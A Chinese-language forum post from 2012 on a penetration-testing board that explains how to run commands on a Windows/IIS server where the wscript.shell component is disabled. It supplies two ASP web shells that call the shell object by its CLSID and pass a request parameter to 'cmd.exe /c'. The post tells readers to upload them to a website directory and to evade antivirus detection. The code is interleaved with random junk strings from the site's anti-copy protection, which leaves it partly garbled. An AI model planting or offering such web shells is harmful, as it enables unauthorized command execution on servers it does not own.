找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
返回列表 发新帖
查看: 3339|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
    ! v2 S* f( p- |1 n8 c9 D" x9 O
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
    1 s* g' ^' C- g  \* Y
  • 要想让运行命令可以试试这种方法,成功率为五五之数。
    : a7 n  x5 m6 `. v9 b2 r' |
  • 把下面代码复制:& [: n, _2 X, n* }  v; n% ^. @; v, k
  • <%0 P$ W2 X) V- Q$ m6 `
  • end if
    4 o  ?# [4 R" U: s! \6 `7 Q. t* D  i
  • response.write(”")
    ; p1 N& H2 n1 J0 P1 X; ~( i
  • On Error Resume
    , n+ M- L0 Y& S% d7 ^
  • Next! C  q9 z: Q- m' ~6 i1 O
  • response.write oScriptlhn.exec(”cmd.exe /c” &
    9 k# i' f9 g5 o& C4 }+ |& r
  • request(”c”)).stdout.readall
    + B2 Q' \8 i% k3 P' p& J
  • response.write(”")
    3 S' ~! L' Z, o; D
  • response.write(”"). o2 V" W5 G9 t: ?1 M  h4 I; }
  • response.write(”3 n5 g. \3 p& s! v  A, _7 g/ E0 w$ I
  • “)
    1 @8 h, \; T( e7 [% N' m
  • response.write(”")8 Z) V  }0 D5 o! ?
  • %>9 b5 ?2 e) S& a# J5 H9 R
  • 保存为一个asp文件,然后传到网站目录上去' v, K$ e1 a8 B* K% y# ^* o% H
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
    ; X5 d8 I$ b! W8 _3 k+ x% t
  • 我用此成功运行过cacls命令。
    2 H$ ]0 o" ~3 ~& I4 s
  • 第二那就是运行时出错,可能限制某些代码执行/ x' B6 |1 @- A" O; h4 [: [
  • 无wscript.shell组件提权又一个方法
    & C) @4 g( z( T5 I8 [) _5 F
  • <object runat=server id=oScriptlhn scope=page 5 a: n# R* D* z+ D+ c& D
  • # C. h& X& Q1 }1 \9 D  i
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object># _' o6 P  j6 g" b1 O
  • <%if err then%> 0 L( i% d8 i. d& q+ Y
  • <object runat=server id=oScriptlhn scope=page
    $ G% y6 G* l, x* b
  • 7 q9 ]5 S% E. q! n" E. n0 @
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>% m% F' T* i' f& ^
  • <% ; {! P9 S/ @8 i$ u! L- S" M' {
  • end if
    ! {9 ~. B! `5 f; b
  • response.write(”<textarea readonly cols=80
    ! K* D4 z) V9 F  q, e
  • ; e" Z7 u! [% w' U
  • rows=20>”) 5 w; M. a; |1 z; p6 m
  • On Error Resume Next ; i* V8 p2 f# f: a
  • response.write / f& _0 @! Z3 y. ~2 M. A( _
  • 9 k/ G$ ^1 C: }) l* \
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
    # f  K* p5 Z, t. q( J
  • response.write(”</textarea>”)
    % E7 l( a( S" Q
  • response.write(”<form % K4 F; S! I! j# }$ I" h: K# p5 s
  • ) Q! N% _& c* z0 P- X- g) Q
  • method=’post’>”)
    + Q& W$ \! c7 w; p
  • response.write(”<input type=text name=’c'
    , g9 A' p8 c/ O3 c3 c! b( d2 ~

  • 5 g- A! K/ w2 Y& F, }$ ^
  • size=60><br>”)
    8 H& L! R& D- G1 D; x
  • response.write(”<input type=submit
    7 G8 X. u3 l$ C: _: F# V. o, d
  • 2 a: `, F& {" R
  • value=’执行’></form>”)
    " g3 a0 Y2 w9 f
  • %>
    0 k/ R3 D9 m( n! K' x9 ]& h
  • 保存为ASP,此代码可能被杀,请注意免杀。2 |6 k9 R$ g" C. o+ ^
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建
    0 H1 N5 u% e, s5 w. J8 P" E8 A
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表